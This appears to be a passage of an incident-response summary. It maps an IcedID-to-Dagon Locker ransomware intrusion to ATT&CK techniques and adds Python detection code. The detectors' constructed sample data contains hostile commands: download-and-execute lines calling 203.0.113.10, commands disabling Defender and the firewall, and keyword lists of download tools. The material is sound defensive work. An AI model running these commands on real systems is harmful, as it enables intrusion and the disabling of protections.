DFIR Summary
https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/
Initial Access
T1566 / Phishing
An email is sent containing a link that redirects the recipient to a malicious page, which eventually downloads a malicious JS file.
Execution
T1027.010 / Obfuscated Files or Information: Command Obfuscation
The JS file was obfuscated
Execution
T1204.002 / User Execution: Malicious File
The user executes the malicious JS file.
Execution
T1059.007 / Command and Scripting Interpreter: JavaScript
Code execution is done through ActiveX objects created from the JS file (Windows Script Host exposes WScript.Shell for exactly this), which let the script spawn other processes.
Execution
T1105 / Ingress Tool Transfer
The JS file downloads IcedID payload from an externally hosted server
Execution
T1059.003 / Command and Scripting Interpreter: Windows Command Shell
The JS file calls cmd.exe to execute other commands.
Execution
T1218.011 / System Binary Proxy Execution: Rundll32
The JS file calls rundll32.exe to execute the IcedID payload (a DLL).
Execution
T1055 / Process Injection
svchost.exe is spawned and IcedID is injected into it.
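Detection logic for the execution chain described above (a script host spawning cmd.exe, rundll32.exe loading a DLL from a user-writable path, and svchost.exe whose parent is anything other than services.exe), as an added Python example; this is not code from the report or from The DFIR Report team. The events are constructed Sysmon Event ID 1 style records: the field names follow Sysmon, but the paths, PIDs and the 203.0.113.10 address are made up.

```python
import re

# Constructed Sysmon Event ID 1 (process creation) records modelled on the chain
# wscript.exe -> cmd.exe -> rundll32.exe -> svchost.exe; not log data from the report.
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "ParentProcessId": 3900,
     "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\victim\Downloads\Invoice.js"'},
    {"ProcessId": 4120, "ParentProcessId": 4100,
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"cmd.exe /c curl -o C:\Users\victim\AppData\Local\Temp\x.dll http://203.0.113.10/x.bin"},
    {"ProcessId": 4150, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rundll32.exe C:\Users\victim\AppData\Local\Temp\x.dll,init"},
    {"ProcessId": 4180, "ParentProcessId": 4150,
     "Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe"},
    # Benign noise: a normal service host and a Control Panel applet launched via rundll32
    {"ProcessId": 900, "ParentProcessId": 700,
     "Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"ProcessId": 5000, "ParentProcessId": 3900,
     "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBIN_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe", "curl.exe"}
# Directories an unprivileged user can write to; a DLL loaded from here by rundll32 is suspicious
USER_WRITABLE = re.compile(r"\\(users|programdata|temp)\\", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def find_suspicious(events):
    """Return (reason, ProcessId) pairs for events matching the IcedID execution chain."""
    hits = []
    for e in events:
        img, parent = basename(e["Image"]), basename(e["ParentImage"])
        # 1. Script host spawning a shell or a proxy-execution binary
        if parent in SCRIPT_HOSTS and img in LOLBIN_CHILDREN:
            hits.append(("script host spawned " + img, e["ProcessId"]))
        # 2. rundll32 loading a DLL from a user-writable directory
        if img == "rundll32.exe" and USER_WRITABLE.search(e["CommandLine"]):
            hits.append(("rundll32 loading DLL from user-writable path", e["ProcessId"]))
        # 3. svchost.exe is normally a child of services.exe; anything else is a likely injection target
        if img == "svchost.exe" and parent != "services.exe":
            hits.append(("svchost.exe not parented by services.exe", e["ProcessId"]))
    return hits


def lineage(events, pid):
    """Walk ParentProcessId links upward and return the process chain, root first."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return list(reversed(chain))


if __name__ == "__main__":
    for reason, pid in find_suspicious(SAMPLE_EVENTS):
        print(f"{pid}: {reason}  [{' -> '.join(lineage(SAMPLE_EVENTS, pid))}]")
```

Rule 3 is the one worth tuning: on a real host, svchost.exe is almost never spawned by anything except services.exe (msiexec.exe and a few installers are the usual exceptions), so this rule should stay tight rather than be widened to every process name.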
Execution
T1070.004 / Indicator Removal: File Deletion
The IcedID configuration file was deleted
Execution
T1059.001 / Command and Scripting Interpreter: PowerShell
PowerShell was used to execute commands.
Execution
T1105 / Ingress Tool Transfer
A Cobalt Strike beacon was downloaded onto the victim host
Execution
T1055 / Process Injection
Through Cobalt Strike, another Cobalt Strike beacon was injected into a running process
Persistence
T1053.005 / Scheduled Task/Job: Scheduled Task
A scheduled task was created for persistence; each time it runs it downloads and executes the Cobalt Strike beacon.
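Because a scheduled task persists on disk as XML under C:\Windows\System32\Tasks, a responder can triage every task file for this download-and-execute pattern. The parser and scoring logic below is an added Python example, not code from the report; the two task documents are constructed (the 203.0.113.10 URL and the author name are made up) and model the shape of a downloader task and of a stock Windows task.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task XML modelled on a download-and-execute persistence task; not from the report.
SAMPLE_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>CORP\\admin</Author></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task with the shape of a built-in Windows maintenance task.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-19</UserId></Principal></Principals>
  <Actions Context="Author">
    <Exec><Command>%windir%\\system32\\sc.exe</Command><Arguments>start w32time task_started</Arguments></Exec>
  </Actions>
</Task>"""

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}
DOWNLOAD = re.compile(r"https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|bitsadmin", re.I)
HIDDEN_OR_ENCODED = re.compile(r"-(?:w|windowstyle)\s+hidden|-enc\w*\s", re.I)


def parse_task(data):
    """Parse a Task Scheduler XML document into triggers, principal and Exec actions.

    Real files under C:\\Windows\\System32\\Tasks are UTF-16 with a BOM: read them with
    open(path, "rb") and pass the bytes; expat picks the encoding up from the BOM.
    """
    root = ET.fromstring(data)
    trig_el = root.find("t:Triggers", NS)
    triggers = [] if trig_el is None else [el.tag.split("}")[-1] for el in trig_el]
    user = root.findtext("t:Principals/t:Principal/t:UserId", default="", namespaces=NS)
    actions = []
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS)
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        actions.append((cmd, args))
    return {"triggers": triggers, "user": user, "actions": actions}


def assess_task(task):
    """Return the reasons a parsed task looks like download-and-execute persistence (empty if none)."""
    reasons = []
    for cmd, args in task["actions"]:
        exe = cmd.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if exe in SHELLS and DOWNLOAD.search(args):
            reasons.append(f"{exe} action fetches remote content")
        if exe in SHELLS and HIDDEN_OR_ENCODED.search(args):
            reasons.append(f"{exe} action hides its window or uses an encoded command")
    # Context only matters once an action is already suspicious
    if reasons and any(t in ("LogonTrigger", "BootTrigger") for t in task["triggers"]):
        reasons.append("fires at logon or boot")
    if reasons and task["user"] == "S-1-5-18":
        reasons.append("runs as SYSTEM")
    return reasons


if __name__ == "__main__":
    for name, xml in (("sample", SAMPLE_TASK), ("benign", BENIGN_TASK)):
        print(name, assess_task(parse_task(xml)))
```

Run this over every file in the Tasks directory tree (and compare the list against the Microsoft-Windows-TaskScheduler/Operational log, Event ID 106, for tasks that were registered and then deleted) rather than trusting schtasks /query output alone, since an attacker with SYSTEM can hide a task from the query by stripping its SD value in the registry.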
Persistence
T1484.001 / Domain or Tenant Policy Modification: Group Policy Modification
On a domain controller, the threat actor placed a .bat file in the group policy scripts directory. When users log in, the logon script downloads and executes the Cobalt Strike beacon, giving the attacker access to every machine the policy applies to.
Persistence
T1133 / External Remote Services
The attacker installed AnyDesk onto the victim machines for remote access
Persistence
T1136.001 / Create Account: Local Account
The attacker created a local account
Persistence
T1098 / Account Manipulation
The attacker added the local account to the local Administrators group.
Persistence
T1564.002 / Hide Artifacts: Hidden Users
The attacker hides the account from the logon screen and user lists by writing a DWORD value named after the account, set to 0, under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList.
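The three persistence steps above (account created, added to Administrators, hidden via SpecialAccounts\UserList) each leave one event: Security 4720, Security 4732 and, where Sysmon is deployed, a registry value-set event (Sysmon Event ID 13). The correlation below is an added Python example, not code from the report; the events are constructed, with field names taken from those event schemas and the host names, the account name "backup" and the operator names invented.

```python
import re
from collections import defaultdict

# Constructed Windows Security (4720, 4732) and Sysmon (13) events modelling the hidden
# local admin persistence chain; the values are made up, only the field names are real.
SAMPLE_EVENTS = [
    {"Provider": "Security", "EventID": 4720, "Host": "WS01",
     "SubjectUserName": "admin", "TargetUserName": "backup"},
    {"Provider": "Security", "EventID": 4732, "Host": "WS01",
     "SubjectUserName": "admin", "MemberName": "WS01\\backup", "TargetUserName": "Administrators"},
    {"Provider": "Sysmon", "EventID": 13, "Host": "WS01", "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\backup",
     "Details": "DWORD (0x00000000)"},
    # A helpdesk account creation on another host: created, but neither admin nor hidden
    {"Provider": "Security", "EventID": 4720, "Host": "WS02",
     "SubjectUserName": "helpdesk", "TargetUserName": "jdoe"},
]

# The value name under UserList is the account being hidden
USERLIST = re.compile(r"\\Winlogon\\SpecialAccounts\\UserList\\([^\\]+)$", re.IGNORECASE)


def correlate(events):
    """Collect per (host, account) which of created / admin / hidden was observed."""
    facts = defaultdict(set)
    for e in events:
        host = e["Host"]
        if e["Provider"] == "Security" and e["EventID"] == 4720:
            facts[(host, e["TargetUserName"].lower())].add("created")
        elif (e["Provider"] == "Security" and e["EventID"] == 4732
              and e["TargetUserName"].lower() == "administrators"):
            # MemberName is DOMAIN\user or HOST\user; keep the account part
            member = e["MemberName"].rsplit("\\", 1)[-1].lower()
            facts[(host, member)].add("admin")
        elif e["Provider"] == "Sysmon" and e["EventID"] == 13:
            m = USERLIST.search(e["TargetObject"])
            # Only a zero DWORD hides the account; a value of 1 re-shows it
            if m and e["Details"].startswith("DWORD (0x00000000)"):
                facts[(host, m.group(1).lower())].add("hidden")
    return {k: sorted(v) for k, v in facts.items()}


def hidden_admins(events):
    """Accounts that are both in Administrators and hidden from the logon UI, whether or not
    they were newly created (an attacker can hide a pre-existing account too)."""
    return sorted(k for k, v in correlate(events).items() if {"admin", "hidden"} <= set(v))


if __name__ == "__main__":
    print(hidden_admins(SAMPLE_EVENTS))
```

Note that Sysmon only records the registry write if its configuration includes a RegistryEvent rule for the Winlogon\SpecialAccounts path; without that, the same state can still be found after the fact by enumerating the UserList key on each host and comparing its value names against local group membership.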
Privilege Escalation
T1068 / Exploitation for Privilege Escalation
The attacker used named-pipe impersonation to escalate privileges from Administrator to SYSTEM.
Defense Evasion
T1562.004 / Impair Defenses: Disable or Modify System Firewall
The attacker modifies the Windows Firewall profile state.
Defense Evasion
T1562.001 / Impair Defenses: Disable or Modify Tools
The attacker disables real-time monitoring in Microsoft Defender.
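A command-line rule for the two defense-impairment steps above has to cope with PowerShell accepting any unambiguous prefix of a parameter name (-DisableRealtimeMon works as well as -DisableRealtimeMonitoring) and with the -Param:$true form, otherwise a trivial abbreviation evades it. The following is an added Python example, not code from the report; the command lines are constructed, and the registry rule covers the Windows Defender Real-Time Protection policy key as a further way of reaching the same state that the page itself does not mention.

```python
import re

# Set-MpPreference parameters whose value $true weakens Defender (partial list, enough for the example)
MP_DISABLE_PARAMS = ["DisableRealtimeMonitoring", "DisableBehaviorMonitoring", "DisableIOAVProtection",
                     "DisableScriptScanning", "DisableBlockAtFirstSeen"]
TRUE_VALUES = {"$true", "1", "true"}

# netsh advfirewall set <profile> state off, for every profile spelling netsh accepts
NETSH_OFF = re.compile(
    r"netsh(?:\.exe)?\s+advfirewall\s+set\s+(?:all|domain|private|public|current)profiles?\s+state\s+off", re.I)
# Policy registry key that disables real-time protection on next policy refresh
REG_RTP = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?HK\w+\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"?'
    r".*?/v\s+DisableRealtimeMonitoring.*?/d\s+1\b", re.I)


def resolve_param(token):
    """Expand a PowerShell parameter token, possibly abbreviated, to its full name.

    Returns (name, inline_value): name is None unless the token is an unambiguous prefix of one
    entry in MP_DISABLE_PARAMS; inline_value is set for the -Param:$true form.
    """
    if not token.startswith("-"):
        return None, None
    name, _, inline = token[1:].partition(":")
    cands = [p for p in MP_DISABLE_PARAMS if p.lower().startswith(name.lower())]
    return (cands[0] if len(cands) == 1 else None), inline


def mp_preference_findings(cmdline):
    """Return the Defender settings a Set-MpPreference invocation turns off."""
    if not re.search(r"set-mppreference", cmdline, re.I):
        return []
    tokens = re.split(r"\s+", cmdline.strip())
    found = []
    for i, tok in enumerate(tokens):
        name, inline = resolve_param(tok)
        if name is None:
            continue
        # Value is either attached with ':' or the next token; strip quotes and statement separators
        value = inline or (tokens[i + 1] if i + 1 < len(tokens) else "")
        if value.strip("'\";,").lower() in TRUE_VALUES:
            found.append(name)
    return found


def impair_defense_findings(cmdline):
    """Combine the Defender, firewall and registry rules into one list of findings."""
    findings = [f"Defender: {p}=$true" for p in mp_preference_findings(cmdline)]
    if NETSH_OFF.search(cmdline):
        findings.append("Firewall: profile state set off")
    if REG_RTP.search(cmdline):
        findings.append("Defender: real-time protection disabled via policy registry key")
    return findings


# Constructed command lines (not from the report) covering the abbreviated and inline-value forms
SAMPLES = [
    'powershell.exe -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true"',
    'powershell -c "Set-MpPreference -DisableRealtimeMon 1; Set-MpPreference -DisableIOAV:$True"',
    "netsh advfirewall set allprofiles state off",
    'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"'
    " /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f",
    "Get-MpPreference | Select DisableRealtimeMonitoring",  # read-only, must not alert
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(impair_defense_findings(s), "<-", s)
```

Two limits to keep in mind: the prefix resolution is only as good as the parameter list, since PowerShell judges ambiguity against the cmdlet's full parameter set, and none of this sees a -EncodedCommand payload; decode the Base64 first and feed the result through the same function.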
Credential Access
T1003.001 / OS Credential Dumping: LSASS Memory
Mimikatz was used to dump LSASS memory to extract credentials.
Credential Access
T1552.001 / Unsecured Credentials: Credentials In Files
The attacker searches for credentials stored in files on the system.
Discovery